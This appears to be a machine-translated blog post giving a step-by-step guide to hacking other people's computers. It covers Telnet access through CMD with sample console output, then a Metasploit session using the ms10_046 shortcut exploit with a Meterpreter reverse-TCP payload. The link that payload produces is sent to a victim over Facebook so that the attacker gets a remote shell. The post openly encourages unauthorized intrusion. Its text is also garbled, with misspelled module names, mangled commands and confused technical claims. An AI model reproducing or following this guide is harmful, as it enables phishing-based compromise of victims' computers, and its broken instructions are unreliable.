Skip to content Skip to sidebar Skip to footer

How to Hack Other People's Computers via the Internet 2021

How to Hack Other People's Computers via the Internet

How to Hack Other People’s Computers via the Internet – With the development of technology, the use of computers is increasing.

Starting from school students, college students, office workers, business people and others always use computers to help them in their assignments and work.

Various important data and information are stored on the computer as well.

In addition, we also need internet network access so that we can surf the virtual world to find various information, play social media or other activities.

But do you know, if the internet network that is used is widely used as a loophole to hack computers? Yes, nowadays technology is growing and we can hack computers in many ways, one of which is through the internet.

You can use this method to hack other people’s computers if you are interested in using it.

Before being used, of course, it must be studied first and you can learn it by listening to the following reviews on how to hack other people’s computers via the internet.

How to Hack Other People’s Computers Through the Internet

1. How to Hack Other People’s Computers Via the Internet with CMD

How to Hack Other People's Computers via the Internet
How to Hack Other People’s Computers Via the Internet with CMD

To be able to hack other people’s computers via the internet with the help of CMD, you must first use Telnet so that the computer can be accessed via an IP address.

This telnet has commands that are almost the same as remote desktops, but telnet is safer when used because it can be controlled remotely.

So that the computer that is the target of the hack can be controlled without the need to hold it directly.

But in some cases, the Telnet command often fails to connect, because the configuration has not been activated and the problem is considered normal.

As for how to hack other people’s computers via the internet with CMD as follows:

  • For the first step, please check the Telnet configuration on your computer by pressing Windows key + R or click Run-say CMD then click OK and wait for the Dos display to appear.
  • Also check the running computer, to check whether the Telnet function can be completed or not and then type the command below:

-net, check which network (host) is currently active.

  • Then you can check the hackable ports to the PC.
  • It is recommended to pay attention to the “External address” section and if passing through Telnet please type a space and write the destination IP.
  • noPort and you will get an open port with port 139:telnet 192.168.16.66 139.
  • Next, please return the Telnet command to a remote computer that is connected to your computer using Telnet PC03 and the method is the same as above.
  • i.e. Telnet 192.168.16.8 (input) and if successful it will appear as follows:

C:Documents and settingsAdministrator>net View

Server name remarks

PC03 Lpkid

SERVER

SERVER-2003

The command complete successfully

C: Documents and settings Administrator> 192.168.2.22

pinging 192.168.2.22 with 32 bytes of data:

Request timed ot

Replay from 192.168.2.22: bytes=32 time<1ms TTI=128

Request timed out

Ping statistics for 192.168.2.22:

Packets: Sent=4, Received=2, Lost=2 (50% loss),

Approximate round trip times in milli-seconds:

Minimum=0ms, Maximum=0ms, Average=0ms

C:Documents and SettingsAdministrator>telnet 192.168.2.22

Welcome to Microsoft Telnet Client

Escape Character is ‘CTRL+]’

  • Your computer password information will be sent remotely via the internet. It may not be safe. Then are you going to send (y/n):n (enter n then press enter).

Welcome to Microsoft Telnet Service login:……

password:*******

Welcome to Microsoft Telnet Server

C:Documents and Settingsadmin>

  • To make sure whether you are actually on the PC03 computer, it is necessary to check the IP address.

Welcome to Microsoft Telnet Server

C:Documents and Settingsadmin>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix:

IP Address……: 192.168.2.22

Subnet Mask……: 255.255.255.0

Default Gateway……:?

C:Documents and Settingsadmin>

  • In order for the Telnet service to be accessible, it must be activated first, then which clients/administrators can Telnet. Now you can control other people’s computers to be hacked.

2. How to Hack Other People’s Computers via the Internet Using Linux Terminal

How to Hack Other People's Computers via the Internet
How to Hack Other People’s Computers over the Internet Using Linux Terminal

Linux terminal is a tool for computers that is already quite popular because it uses the backtrack method and has many advantages.

With the backtrack method, the computer can be attacked by a Linux terminal and this backtrack has several versions such as 1, 2, 3, 4, 5 and so on.

You can also use derived classes from the backtracking kernel because it has complete tools and is almost the same as Backbox, Kali Linux and others.

Meanwhile, how to hack other people’s computers via the internet using a Linux terminal is as follows:

1. Open the backtrack terminal

As for how to open it as follows:

  • Download metasploit via the following link (Download metasploit).
  • Then open the terminal and run the downloaded metasploit.
  • Next, please type the command “cd (directory location), for example the location on cd c: metasploit and press enter.
  • Then enter the command sudo chmod + x (metasploit name) run it and hit enter.
  • For the next command code which is sudo ./(name metasploit) run it and press enter.
  • Please also type msfconsole and press enter.
  • Also type use exploit/Windows/browser/ms10_046_shorcut_icon_dllloader

2. Knowing the IP address of other people’s computers

The method is as follows:

  • Please type ifconfig and you will see the IP address. Then type also set srvhost (your IP address) then press enter and set lhost (your IP address).
  • Then type set PAYLOAD windows / meterpreteer / reverse_tcp then press enter and see if it works or not, please type show options then type exploit.
  • Then you will get URL IP like url address http:// 192 ??? then you send the URL via FB which is the destination and click the URL.
  • If you have, then you will find the hack target by clicking on the URL address by typing sessions-i 1 and retyping session-1.

3. How to use terminal or CMD

You will then be able to see which computers clicked on your IP URL tool after sessions-i.

Once known, it’s time for you to do the hacking process on the computer by typing shell sysinfo and various directories or folders will be visible.

The final word

Some of the ways as described above you can use to hack other people’s computers via the internet.

Make sure the internet connection is in a strong and stable condition so that the hack process runs smoothly.

In addition, pay attention and do every rare well and correctly, guys.

Dody S.

Someone who likes to learn and share everything about technology.

Post a Comment for "How to Hack Other People's Computers via the Internet 2021"